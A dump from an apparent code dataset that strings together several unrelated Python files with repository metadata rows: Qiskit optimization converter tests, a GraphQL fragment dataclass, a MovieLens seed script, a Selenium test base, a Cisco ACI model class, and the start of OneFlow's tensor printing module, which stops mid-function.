op.linear_constraint(linear_constraint, Constraint.Sense.EQ, 1, 'x0x1')
linear_constraint = {'x1': 1, 'x2': -1}
op.linear_constraint(linear_constraint, Constraint.Sense.EQ, 2, 'x1x2')
linear_constraint = {'x0': 1, 'x2': -1}
op.linear_constraint(linear_constraint, Constraint.Sense.EQ, 1, 'x0x2')
op.minimize(constant=3, linear={'x0': 1}, quadratic={('x1', 'x2'): 2})
self.assertEqual(op.get_num_linear_constraints(), 3)
conv = LinearEqualityToPenalty()
op2 = conv.convert(op)
self.assertEqual(op2.get_num_linear_constraints(), 0)
result = OptimizationResult(x=[0, 1, -1], fval=1, variables=op2.variables)
new_result = conv.interpret(result)
self.assertAlmostEqual(new_result.fval, 1)
self.assertEqual(new_result.status, OptimizationResultStatus.SUCCESS)
np.testing.assert_array_almost_equal(new_result.x, [0, 1, -1])
self.assertListEqual(result.variable_names, ['x0', 'x1', 'x2'])
self.assertDictEqual(result.variables_dict, {'x0': 0, 'x1': 1, 'x2': -1})
def test_integer_to_binary(self):
""" Test integer to binary """
op = QuadraticProgram()
for i in range(0, 2):
op.binary_var(name='x{}'.format(i))
op.integer_var(name='x2', lowerbound=0, upperbound=5)
linear = {}
for i, x in enumerate(op.variables):
linear[x.name] = i + 1
op.maximize(0, linear, {})
conv = IntegerToBinary()
op2 = conv.convert(op)
self.assertEqual(op2.get_num_vars(), 5)
self.assertListEqual([x.vartype for x in op2.variables], [Variable.Type.BINARY] * 5)
self.assertListEqual([x.name for x in op2.variables], ['x0', 'x1', 'x2@0', 'x2@1', 'x2@2'])
dct = op2.objective.linear.to_dict()
self.assertEqual(dct[2], 3)
self.assertEqual(dct[3], 6)
self.assertEqual(dct[4], 6)
def test_binary_to_integer(self):
""" Test binary to integer """
op = QuadraticProgram()
for i in range(0, 2):
op.binary_var(name='x{}'.format(i))
op.integer_var(name='x2', lowerbound=0, upperbound=5)
linear = {'x0': 1, 'x1': 2, 'x2': 1}
op.maximize(0, linear, {})
linear = {}
for x in op.variables:
linear[x.name] = 1
op.linear_constraint(linear, Constraint.Sense.EQ, 6, 'x0x1x2')
conv = IntegerToBinary()
op2 = conv.convert(op)
result = OptimizationResult(x=[0, 1, 1, 1, 1], fval=17, variables=op2.variables)
new_result = conv.interpret(result)
np.testing.assert_array_almost_equal(new_result.x, [0, 1, 5])
self.assertEqual(new_result.fval, 17)
self.assertListEqual(new_result.variable_names, ['x0', 'x1', 'x2'])
self.assertDictEqual(new_result.variables_dict, {'x0': 0, 'x1': 1, 'x2': 5})
def test_optimizationproblem_to_ising(self):
""" Test optimization problem to operators"""
op = QuadraticProgram()
for i in range(4):
op.binary_var(name='x{}'.format(i))
linear = {}
for x in op.variables:
linear[x.name] = 1
op.maximize(0, linear, {})
linear = {}
for i, x in enumerate(op.variables):
linear[x.name] = i + 1
op.linear_constraint(linear, Constraint.Sense.EQ, 3, 'sum1')
penalize = LinearEqualityToPenalty(penalty=1e5)
op2 = penalize.convert(op)
qubitop, offset = op2.to_ising()
self.assertEqual(qubitop, QUBIT_OP_MAXIMIZE_SAMPLE)
self.assertEqual(offset, OFFSET_MAXIMIZE_SAMPLE)
def test_ising_to_quadraticprogram_linear(self):
""" Test optimization problem to operators with linear=True"""
op = QUBIT_OP_MAXIMIZE_SAMPLE
offset = OFFSET_MAXIMIZE_SAMPLE
quadratic = QuadraticProgram()
quadratic.from_ising(op, offset, linear=True)
self.assertEqual(quadratic.get_num_vars(), 4)
self.assertEqual(quadratic.get_num_linear_constraints(), 0)
self.assertEqual(quadratic.get_num_quadratic_constraints(), 0)
self.assertEqual(quadratic.objective.sense, quadratic.objective.Sense.MINIMIZE)
self.assertAlmostEqual(quadratic.objective.constant, 900000)
linear_matrix = np.zeros((1, 4))
linear_matrix[0, 0] = -500001
linear_matrix[0, 1] = -800001
linear_matrix[0, 2] = -900001
linear_matrix[0, 3] = -800001
quadratic_matrix = np.zeros((4, 4))
quadratic_matrix[0, 1] = 400000
quadratic_matrix[0, 2] = 600000
quadratic_matrix[1, 2] = 1200000
quadratic_matrix[0, 3] = 800000
quadratic_matrix[1, 3] = 1600000
quadratic_matrix[2, 3] = 2400000
np.testing.assert_array_almost_equal(
quadratic.objective.linear.coefficients.toarray(), linear_matrix
)
np.testing.assert_array_almost_equal(
quadratic.objective.quadratic.coefficients.toarray(), quadratic_matrix
)
def test_ising_to_quadraticprogram_quadratic(self):
""" Test optimization problem to operators with linear=False"""
op = QUBIT_OP_MAXIMIZE_SAMPLE
offset = OFFSET_MAXIMIZE_SAMPLE
quadratic = QuadraticProgram()
quadratic.from_ising(op, offset, linear=False)
self.assertEqual(quadratic.get_num_vars(), 4)
self.assertEqual(quadratic.get_num_linear_constraints(), 0)
self.assertEqual(quadratic.get_num_quadratic_constraints(), 0)
self.assertEqual(quadratic.objective.sense, quadratic.objective.Sense.MINIMIZE)
self.assertAlmostEqual(quadratic.objective.constant, 900000)
quadratic_matrix = np.zeros((4, 4))
quadratic_matrix[0, 0] = -500001
quadratic_matrix[0, 1] = 400000
quadratic_matrix[0, 2] = 600000
quadratic_matrix[0, 3] = 800000
quadratic_matrix[1, 1] = -800001
quadratic_matrix[1, 2] = 1200000
quadratic_matrix[1, 3] = 1600000
quadratic_matrix[2, 2] = -900001
quadratic_matrix[2, 3] = 2400000
quadratic_matrix[3, 3] = -800001
np.testing.assert_array_almost_equal(
quadratic.objective.quadratic.coefficients.toarray(), quadratic_matrix
)
def test_continuous_variable_decode(self):
""" Test decode func of IntegerToBinaryConverter for continuous variables"""
try:
mdl = Model('test_continuous_varable_decode')
c = mdl.continuous_var(lb=0, ub=10.9, name='c')
x = mdl.binary_var(name='x')
mdl.maximize(c + x * x)
op = QuadraticProgram()
op.from_docplex(mdl)
converter = IntegerToBinary()
op = converter.convert(op)
admm_params = ADMMParameters()
qubo_optimizer = MinimumEigenOptimizer(NumPyMinimumEigensolver())
continuous_optimizer = CplexOptimizer()
solver = ADMMOptimizer(
qubo_optimizer=qubo_optimizer,
continuous_optimizer=continuous_optimizer,
params=admm_params,
)
result = solver.solve(op)
result = converter.interpret(result)
self.assertEqual(result.x[0], 10.9)
self.assertListEqual(result.variable_names, ['c', 'x'])
self.assertDictEqual(result.variables_dict, {'c': 10.9, 'x': 0})
except NameError as ex:
self.skipTest(str(ex))
def test_auto_penalty(self):
""" Test auto penalty function"""
op = QuadraticProgram()
op.binary_var('x')
op.binary_var('y')
op.binary_var('z')
op.minimize(constant=3, linear={'x': 1}, quadratic={('x', 'y'): 2})
op.linear_constraint(linear={'x': 1, 'y': 1, 'z': 1}, sense='EQ', rhs=2, name='xyz_eq')
lineq2penalty = LinearEqualityToPenalty(penalty=1e5)
lineq2penalty_auto = LinearEqualityToPenalty()
qubo = lineq2penalty.convert(op)
qubo_auto = lineq2penalty_auto.convert(op)
exact_mes = NumPyMinimumEigensolver()
exact = MinimumEigenOptimizer(exact_mes)
result = exact.solve(qubo)
result_auto = exact.solve(qubo_auto)
self.assertEqual(result.fval, result_auto.fval)
np.testing.assert_array_almost_equal(result.x, result_auto.x)
def test_auto_penalty_warning(self):
""" Test warnings of auto penalty function"""
op = QuadraticProgram()
op.binary_var('x')
op.binary_var('y')
op.binary_var('z')
op.minimize(linear={'x': 1, 'y': 2})
op.linear_constraint(linear={'x': 0.5, 'y': 0.5, 'z': 0.5}, sense='EQ', rhs=1, name='xyz')
with self.assertLogs('qiskit.optimization', level='WARNING') as log:
lineq2penalty = LinearEqualityToPenalty()
_ = lineq2penalty.convert(op)
warning = (
'WARNING:qiskit.optimization.converters.linear_equality_to_penalty:'
'Warning: Using 100000.000000 for the penalty coefficient because a float '
'coefficient exists in constraints. \nThe value could be too small. If so, '
'set the penalty coefficient manually.'
)
self.assertIn(warning, log.output)
def test_linear_equality_to_penalty_decode(self):
""" Test decode func of LinearEqualityToPenalty"""
qprog = QuadraticProgram()
qprog.binary_var('x')
qprog.binary_var('y')
qprog.binary_var('z')
qprog.maximize(linear={'x': 3, 'y': 1, 'z': 1})
qprog.linear_constraint(linear={'x': 1, 'y': 1, 'z': 1}, sense='EQ', rhs=2, name='xyz_eq')
lineq2penalty = LinearEqualityToPenalty()
qubo = lineq2penalty.convert(qprog)
exact_mes = NumPyMinimumEigensolver()
exact = MinimumEigenOptimizer(exact_mes)
result = exact.solve(qubo)
decoded_result = lineq2penalty.interpret(result)
self.assertEqual(decoded_result.fval, 4)
np.testing.assert_array_almost_equal(decoded_result.x, [1, 1, 0])
self.assertEqual(decoded_result.status, OptimizationResultStatus.SUCCESS)
self.assertListEqual(decoded_result.variable_names, ['x', 'y', 'z'])
self.assertDictEqual(decoded_result.variables_dict, {'x': 1.0, 'y': 1.0, 'z': 0.0})
infeasible_result = OptimizationResult(x=[1, 1, 1], fval=0, variables=qprog.variables)
decoded_infeasible_result = lineq2penalty.interpret(infeasible_result)
self.assertEqual(decoded_infeasible_result.fval, 5)
np.testing.assert_array_almost_equal(decoded_infeasible_result.x, [1, 1, 1])
self.assertEqual(decoded_infeasible_result.status, OptimizationResultStatus.INFEASIBLE)
self.assertListEqual(infeasible_result.variable_names, ['x', 'y', 'z'])
self.assertDictEqual(infeasible_result.variables_dict, {'x': 1.0, 'y': 1.0, 'z': 1.0})
def test_empty_problem_deprecated(self):
""" Test empty problem """
op = QuadraticProgram()
conv = InequalityToEquality()
op = conv.encode(op)
conv = IntegerToBinary()
op = conv.encode(op)
conv = LinearEqualityToPenalty()
op = conv.encode(op)
conv = QuadraticProgramToIsing()
_, shift = conv.encode(op)
self.assertEqual(shift, 0.0)
def test_valid_variable_type_deprecated(self):
"""Validate the types of the variables for QuadraticProgramToIsing."""
# Integer variable
with self.assertRaises(QiskitOptimizationError):
op = QuadraticProgram()
op.integer_var(0, 10, "int_var")
conv = QuadraticProgramToIsing()
_ = conv.encode(op)
# Continuous variable
with self.assertRaises(QiskitOptimizationError):
op = QuadraticProgram()
op.continuous_var(0, 10, "continuous_var")
conv = QuadraticProgramToIsing()
_ = conv.encode(op)
def test_optimizationproblem_to_ising_deprecated(self):
""" Test optimization problem to operators"""
op = QuadraticProgram()
for i in range(4):
op.binary_var(name='x{}'.format(i))
linear = {}
for x in op.variables:
linear[x.name] = 1
op.maximize(0, linear, {})
linear = {}
for i, x in enumerate(op.variables):
linear[x.name] = i + 1
op.linear_constraint(linear, Constraint.Sense.EQ, 3, 'sum1')
penalize = LinearEqualityToPenalty(penalty=1e5)
op2ope = QuadraticProgramToIsing()
op2 = penalize.encode(op)
qubitop, offset = op2ope.encode(op2)
self.assertEqual(qubitop, QUBIT_OP_MAXIMIZE_SAMPLE)
self.assertEqual(offset, OFFSET_MAXIMIZE_SAMPLE)
def test_ising_to_quadraticprogram_linear_deprecated(self):
""" Test optimization problem to operators with linear=True"""
op = QUBIT_OP_MAXIMIZE_SAMPLE
offset = OFFSET_MAXIMIZE_SAMPLE
op2qp = IsingToQuadraticProgram(linear=True)
quadratic = op2qp.encode(op, offset)
self.assertEqual(len(quadratic.variables), 4)
self.assertEqual(len(quadratic.linear_constraints), 0)
self.assertEqual(len(quadratic.quadratic_constraints), 0)
self.assertEqual(quadratic.objective.sense, quadratic.objective.Sense.MINIMIZE)
self.assertAlmostEqual(quadratic.objective.constant, 900000)
linear_matrix = np.zeros((1, 4))
linear_matrix[0, 0] = -500001
linear_matrix[0, 1] = -800001
linear_matrix[0, 2] = -900001
linear_matrix[0, 3] = -800001
quadratic_matrix = np.zeros((4, 4))
quadratic_matrix[0, 1] = 400000
quadratic_matrix[0, 2] = 600000
quadratic_matrix[1, 2] = 1200000
quadratic_matrix[0, 3] = 800000
quadratic_matrix[1, 3] = 1600000
quadratic_matrix[2, 3] = 2400000
np.testing.assert_array_almost_equal(
quadratic.objective.linear.coefficients.toarray(), linear_matrix
)
np.testing.assert_array_almost_equal(
quadratic.objective.quadratic.coefficients.toarray(), quadratic_matrix
)
def test_ising_to_quadraticprogram_quadratic_deprecated(self):
""" Test optimization problem to operators with linear=False"""
op = QUBIT_OP_MAXIMIZE_SAMPLE
offset = OFFSET_MAXIMIZE_SAMPLE
op2qp = IsingToQuadraticProgram(linear=False)
quadratic = op2qp.encode(op, offset)
self.assertEqual(len(quadratic.variables), 4)
self.assertEqual(len(quadratic.linear_constraints), 0)
self.assertEqual(len(quadratic.quadratic_constraints), 0)
self.assertEqual(quadratic.objective.sense, quadratic.objective.Sense.MINIMIZE)
self.assertAlmostEqual(quadratic.objective.constant, 900000)
quadratic_matrix = np.zeros((4, 4))
quadratic_matrix[0, 0] = -500001
quadratic_matrix[0, 1] = 400000
quadratic_matrix[0, 2] = 600000
quadratic_matrix[0, 3] = 800000
quadratic_matrix[1, 1] = -800001
quadratic_matrix[1, 2] = 1200000
quadratic_matrix[1, 3] = 1600000
quadratic_matrix[2, 2] = -900001
quadratic_matrix[2, 3] = 2400000
quadratic_matrix[3, 3] = -800001
np.testing.assert_array_almost_equal(
quadratic.objective.quadratic.coefficients.toarray(), quadratic_matrix
)
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
0b3eeb02095fbf2030db653bc03576071c4a956a | 9672fa478478085b69c7ef8f02eaa7fa0bc7767b | /symphony/cli/pyinventory/graphql/fragment/service_endpoint.py | f22a4f54006c151f24a0aaab059869fd9813ff4f | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | julianchr/magma | 437a1d86490ff5f1d279cf2cd3243bbd3f22f715 | f0b2ed7e08314208133cf722921d6e6ab7853825 | refs/heads/master | 2022-09-21T21:45:14.678593 | 2020-05-28T22:47:52 | 2020-05-28T22:49:52 | 267,723,888 | 0 | 0 | NOASSERTION | 2020-05-29T00:07:02 | 2020-05-29T00:07:01 | null | UTF-8 | Python | false | false | 1,352 | py | #!/usr/bin/env python3
# @generated AUTOGENERATED file. Do not Change!
from dataclasses import dataclass
from datetime import datetime
from gql.gql.datetime_utils import DATETIME_FIELD
from gql.gql.graphql_client import GraphqlClient
from gql.gql.client import OperationException
from gql.gql.reporter import FailedOperationException
from functools import partial
from numbers import Number
from typing import Any, Callable, List, Mapping, Optional
from time import perf_counter
from dataclasses_json import DataClassJsonMixin
from ..fragment.equipment_port import EquipmentPortFragment, QUERY as EquipmentPortFragmentQuery
from ..fragment.service_endpoint_definition import ServiceEndpointDefinitionFragment, QUERY as ServiceEndpointDefinitionFragmentQuery
QUERY: List[str] = EquipmentPortFragmentQuery + ServiceEndpointDefinitionFragmentQuery + ["""
fragment ServiceEndpointFragment on ServiceEndpoint {
id
port {
...EquipmentPortFragment
}
definition {
...ServiceEndpointDefinitionFragment
}
}
"""]
@dataclass
class ServiceEndpointFragment(DataClassJsonMixin):
@dataclass
class EquipmentPort(EquipmentPortFragment):
pass
@dataclass
class ServiceEndpointDefinition(ServiceEndpointDefinitionFragment):
pass
id: str
definition: ServiceEndpointDefinition
port: Optional[EquipmentPort]
| [
"[email protected]"
] | |
548980782c09a047bbcc43b0e12a6dae822cdcc6 | ed1d841dbd836f5a02a8b2c22bcc92380f28d11b | /seed.py | 9b08aa64301e4ced1c79ad9d8a6e7a7e4658118c | [] | no_license | GraceDurham/ratings | b063389f368f0b3994f0771ca4cac46555a04a10 | 2e628c2a824ca5a10879a15282cd60e21695322b | refs/heads/master | 2020-05-23T07:59:29.310561 | 2017-02-03T02:00:36 | 2017-02-03T02:00:36 | 80,483,352 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,894 | py | """Utility file to seed ratings database from MovieLens data in seed_data/"""
from sqlalchemy import func
from model import User
from model import Rating
from model import Movie
from datetime import datetime
from model import connect_to_db, db
from server import app
def load_users():
"""Load users from u.user into database."""
print "Users"
# Delete all rows in table, so if we need to run this a second time,
# we won't be trying to add duplicate users
User.query.delete()
# Read u.user file and insert data
for row in open("seed_data/u.user"):
row = row.rstrip()
user_id, age, gender, occupation, zipcode = row.split("|")
user = User(user_id=user_id,
age=age,
zipcode=zipcode)
# We need to add to the session or it won't ever be stored
db.session.add(user)
# Once we're done, we should commit our work
db.session.commit()
def load_movies():
"""Load movies from u.item into database."""
print "Movies"
# Delete all rows in table, so if we need to run this a second time,
# we won't be trying to add duplicate users
Movie.query.delete()
# Read u.user file and insert data
for row in open("seed_data/u.item"):
# striped the whitespace
row = row.rstrip()
# print "each row!", row
# we took the row and split it on the pipe
row_split = row.split("|")
# print "it's splitted!!", row_split
# sliced the giant list into only 0-4 index
first_five = row_split[:5]
# print "this is our short list", first_five
# unpacked the first five items from the u.item list
movie_id, title, released_at, empty, imdb_url = first_five
# print first_five
#Boolean if released at is not an empty string evaluates true
#set string to datetime object
# else make datetime equal none if no value is present in release at
if released_at:
released_at = datetime.strptime(released_at, "%d-%b-%Y")
else:
released_at = None
title = title[:-7] # (year) ==7
movie = Movie(movie_id=movie_id,
title=title,
released_at=released_at,
imdb_url=imdb_url)
# We need to add to the session or it won't ever be stored
db.session.add(movie)
# Once we're done, we should commit our work
db.session.commit()
def load_ratings():
"""Load ratings from u.data into database."""
print "Ratings"
# Delete all rows in table, so if we need to run this a second time,
# we won't be trying to add duplicate users
Rating.query.delete()
# Read u.user file and insert data
for row in open("seed_data/u.data"):
row = row.strip().split()
user_id, movie_id, score, time_stamp = row
# print row
rating = Rating(
user_id=int(user_id),
movie_id=int(movie_id),
score=int(score))
# We need to add to the session or it won't ever be stored
db.session.add(rating)
# Once we're done, we should commit our work
db.session.commit()
def set_val_user_id():
"""Set value for the next user_id after seeding database"""
# Get the Max user_id in the database
result = db.session.query(func.max(User.user_id)).one()
max_id = int(result[0])
# Set the value for the next user_id to be max_id + 1
query = "SELECT setval('users_user_id_seq', :new_id)"
db.session.execute(query, {'new_id': max_id + 1})
db.session.commit()
if __name__ == "__main__":
connect_to_db(app)
# In case tables haven't been created, create them
db.create_all()
# Import different types of data
load_users()
load_movies()
load_ratings()
set_val_user_id()
| [
"[email protected]"
] | |
38af83d170297d348201ba84ec024ff6782f1b88 | e6dab5aa1754ff13755a1f74a28a201681ab7e1c | /.parts/lib/django-1.4/tests/regressiontests/admin_custom_urls/urls.py | 12f440e54206905c1883af69161ca4715a9ff7be | [] | no_license | ronkagan/Euler_1 | 67679203a9510147320f7c6513eefd391630703e | 022633cc298475c4f3fd0c6e2bde4f4728713995 | refs/heads/master | 2021-01-06T20:45:52.901025 | 2014-09-06T22:34:16 | 2014-09-06T22:34:16 | 23,744,842 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 113 | py | /home/action/.parts/packages/googleappengine/1.9.4/lib/django-1.4/tests/regressiontests/admin_custom_urls/urls.py | [
"[email protected]"
] | |
f7c2105bdadbd86b2600eff80773427f74aa8d3b | 525f39ec2fe53bcd65ff13b87c7a900358e30c1c | /Lab3B/1C.py | a539436e5493292aab72694f459c7520aa9e2d66 | [] | no_license | abdullah2808/ENGR_102 | fc2cbda672c407d8cf24c14238c2354516c8d7d7 | 6b3080e01c162e16b207df0099427368ab231af9 | refs/heads/master | 2022-12-14T23:49:56.090186 | 2020-09-13T21:31:12 | 2020-09-13T21:31:12 | 295,239,783 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 719 | py | # By submitting this assignment, I agree to the following:
# “Aggies do not lie, cheat, or steal, or tolerate those who do”
# “I have not given or received any unauthorized aid on this assignment”
#
# Name: ABDULLAH AHMAD
# Section: 518
# Assignment: LAB 3B - 1C
# Date: 13/9/18
Days = int(input("Please enter the amount of days of production: "))
Initial = int(input("Please enter the initial production of the well: "))
Decline = int(input("Please enter the decline rate of the well: " ))
HyperCons = .8
Arps = (Initial/((1 + (HyperCons * Decline * Days ))**(1/HyperCons )))
print ("The production of a well after", Days, "days and with a hyperbolic constant of .8 is", Arps) # ARPS EQUATION
| [
"[email protected]"
] | |
b4838aea4ebb660fe5f294da900b8d93a5ba1f09 | 2a671de9ff13e2d82de0abbffa1712000a5c53e6 | /selenium/Website/testcase/model/testutil.py | f1f3b0daca07106b384c17d22f00e0307a46e3fb | [] | no_license | asdf27901/auto_selenium | eddb28ed60cb8238bc5f742f66ddd972e0a518d0 | f669a222e102c1737966d8863e4a74650403e379 | refs/heads/main | 2023-03-27T01:08:07.695555 | 2021-03-14T18:31:40 | 2021-03-14T18:31:40 | 347,719,423 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 350 | py | import unittest
from driver.driver import *
from Website.config.data_config import *
class SetStartAndEnd(unittest.TestCase):
def setUp(self) -> None:
self.driver = get_driver()
self.driver.maximize_window()
self.driver.implicitly_wait(timeout)
def tearDown(self) -> None:
self.driver.quit()
| [
"[email protected]"
] | |
c885620223bab7b3b759d52fbf738145d6690444 | 3c000380cbb7e8deb6abf9c6f3e29e8e89784830 | /venv/Lib/site-packages/cobra/modelimpl/rtctrl/setrtmetricdef.py | f5d55b1458f3e0a5d0f447271471db818060c777 | [] | no_license | bkhoward/aciDOM | 91b0406f00da7aac413a81c8db2129b4bfc5497b | f2674456ecb19cf7299ef0c5a0887560b8b315d0 | refs/heads/master | 2023-03-27T23:37:02.836904 | 2021-03-26T22:07:54 | 2021-03-26T22:07:54 | 351,855,399 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,969 | py | # coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2020 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class SetRtMetricDef(Mo):
"""
The set route metric definition.
"""
meta = ClassMeta("cobra.model.rtctrl.SetRtMetricDef")
meta.moClassName = "rtctrlSetRtMetricDef"
meta.rnFormat = "smetric"
meta.category = MoCategory.REGULAR
meta.label = "None"
meta.writeAccessMask = 0x1000001
meta.readAccessMask = 0x1000001
meta.isDomainable = False
meta.isReadOnly = True
meta.isConfigurable = False
meta.isDeletable = False
meta.isContextRoot = False
meta.childClasses.add("cobra.model.fault.Delegate")
meta.childNamesAndRnPrefix.append(("cobra.model.fault.Delegate", "fd-"))
meta.parentClasses.add("cobra.model.rtctrl.AttrDef")
meta.superClasses.add("cobra.model.pol.Comp")
meta.superClasses.add("cobra.model.rtctrl.ASetRule")
meta.superClasses.add("cobra.model.fabric.L3ProtoComp")
meta.superClasses.add("cobra.model.fabric.ProtoComp")
meta.superClasses.add("cobra.model.pol.Obj")
meta.superClasses.add("cobra.model.naming.NamedObject")
meta.superClasses.add("cobra.model.rtctrl.ASetRtMetric")
meta.rnPrefixes = [
('smetric', False),
]
prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("deleteAll", "deleteall", 16384)
prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
prop._addConstant("ignore", "ignore", 4096)
meta.props.add("childAction", prop)
prop = PropMeta("str", "descr", "descr", 5582, PropCategory.REGULAR)
prop.label = "Description"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 128)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("descr", prop)
prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
prop.label = "None"
prop.isDn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("dn", prop)
prop = PropMeta("str", "lcOwn", "lcOwn", 9, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "local"
prop._addConstant("implicit", "implicit", 4)
prop._addConstant("local", "local", 0)
prop._addConstant("policy", "policy", 1)
prop._addConstant("replica", "replica", 2)
prop._addConstant("resolveOnBehalf", "resolvedonbehalf", 3)
meta.props.add("lcOwn", prop)
prop = PropMeta("str", "metric", "metric", 795, PropCategory.REGULAR)
prop.label = "None"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(1, 4294967295)]
meta.props.add("metric", prop)
prop = PropMeta("str", "modTs", "modTs", 7, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "never"
prop._addConstant("never", "never", 0)
meta.props.add("modTs", prop)
prop = PropMeta("str", "name", "name", 4991, PropCategory.REGULAR)
prop.label = "Name"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 64)]
prop.regex = ['[a-zA-Z0-9_.:-]+']
meta.props.add("name", prop)
prop = PropMeta("str", "nameAlias", "nameAlias", 28417, PropCategory.REGULAR)
prop.label = "Name alias"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 63)]
prop.regex = ['[a-zA-Z0-9_.-]+']
meta.props.add("nameAlias", prop)
prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
prop.label = "None"
prop.isRn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("rn", prop)
prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("created", "created", 2)
prop._addConstant("deleted", "deleted", 8)
prop._addConstant("modified", "modified", 4)
meta.props.add("status", prop)
prop = PropMeta("str", "type", "type", 794, PropCategory.REGULAR)
prop.label = "None"
prop.isConfig = True
prop.isAdmin = True
prop.defaultValue = 5
prop.defaultValueStr = "metric"
prop._addConstant("as-path", "as-path", 11)
prop._addConstant("community", "community", 1)
prop._addConstant("dampening-pol", "dampening-type", 10)
prop._addConstant("ip-nh", "ip-nexthop", 8)
prop._addConstant("local-pref", "local-preference", 4)
prop._addConstant("metric", "metric", 5)
prop._addConstant("metric-type", "metric-type", 9)
prop._addConstant("ospf-fwd-addr", "ospf-fowarding-address", 7)
prop._addConstant("ospf-nssa", "ospf-nssa-area", 6)
prop._addConstant("rt-tag", "route-tag", 2)
prop._addConstant("rt-weight", "route-weight", 3)
meta.props.add("type", prop)
def __init__(self, parentMoOrDn, markDirty=True, **creationProps):
namingVals = []
Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
| [
"[email protected]"
] | |
d4b8f5989466780e1f4819d54a8447935d821ed3 | b368f0dd09a4eed97a350ca01ac170bb44347f8d | /python/oneflow/framework/tensor_str.py | 10ecfbbc8c30e7196b4c34f79684cca7d94e273f | [
"Apache-2.0"
] | permissive | opencici2006/oneflow | bb67d3475e5b85d88f7f627733af75859e431759 | 7c3b42fa5ae95823d195c077565f0c190d98e7ad | refs/heads/master | 2023-08-01T14:22:33.745620 | 2021-09-09T02:52:54 | 2021-09-09T02:52:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,715 | py | """
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
"""
This file is mostly referenced from PyTorch v1.8.1 torch/_tensor_str.py
"""
import numpy as np
import math
from typing import Optional
import oneflow as flow
class __PrinterOptions(object):
precision: int = 4
threshold: float = 1000
edgeitems: int = 3
linewidth: int = 80
sci_mode: Optional[bool] = None
PRINT_OPTS = __PrinterOptions()
def _try_convert_to_local_tensor(tensor):
if tensor.is_consistent:
tensor = tensor.to_consistent(
placement=tensor.placement, sbp=flow.sbp.broadcast
).to_local()
return tensor
class _Formatter(object):
def __init__(self, tensor):
self.floating_dtype = tensor.dtype.is_floating_point
self.int_mode = True
self.sci_mode = False
self.max_width = 1
self.random_sample_num = 50
tensor = _try_convert_to_local_tensor(tensor)
with flow.no_grad():
tensor_view = tensor.reshape(-1)
if not self.floating_dtype:
for value in tensor_view:
value_str = "{}".format(value)
self.max_width = max(self.max_width, len(value_str))
else:
nonzero_finite_vals = flow.masked_select(tensor_view, tensor_view.ne(0))
if nonzero_finite_vals.numel() == 0:
# no valid number, do nothing
return
nonzero_finite_abs = nonzero_finite_vals.abs()
nonzero_finite_min = nonzero_finite_abs.min().numpy().astype(np.float64)
nonzero_finite_max = nonzero_finite_abs.max().numpy().astype(np.float64)
for value in nonzero_finite_abs.numpy():
if value != np.ceil(value):
self.int_mode = False
break
if self.int_mode:
# Check if scientific representation should be used.
if (
nonzero_finite_max / nonzero_finite_min > 1000.0
or nonzero_finite_max > 1.0e8
):
self.sci_mode = True
for value in nonzero_finite_vals:
value_str = (
("{{:.{}e}}").format(PRINT_OPTS.precision).format(value)
)
self.max_width = max(self.max_width, len(value_str))
else:
for value in nonzero_finite_vals:
value_str = ("{:.0f}").format(value)
self.max_width = max(self.max_width, len(value_str) + 1)
else:
if (
nonzero_finite_max / nonzero_finite_min > 1000.0
or nonzero_finite_max > 1.0e8
or nonzero_finite_min < 1.0e-4
):
self.sci_mode = True
for value in nonzero_finite_vals:
value_str = (
("{{:.{}e}}").format(PRINT_OPTS.precision).format(value)
)
self.max_width = max(self.max_width, len(value_str))
else:
for value in nonzero_finite_vals:
value_str = (
("{{:.{}f}}").format(PRINT_OPTS.precision).format(value)
)
self.max_width = max(self.max_width, len(value_str))
if PRINT_OPTS.sci_mode is not None:
self.sci_mode = PRINT_OPTS.sci_mode
def width(self):
return self.max_width
def format(self, value):
if self.floating_dtype:
if self.sci_mode:
ret = (
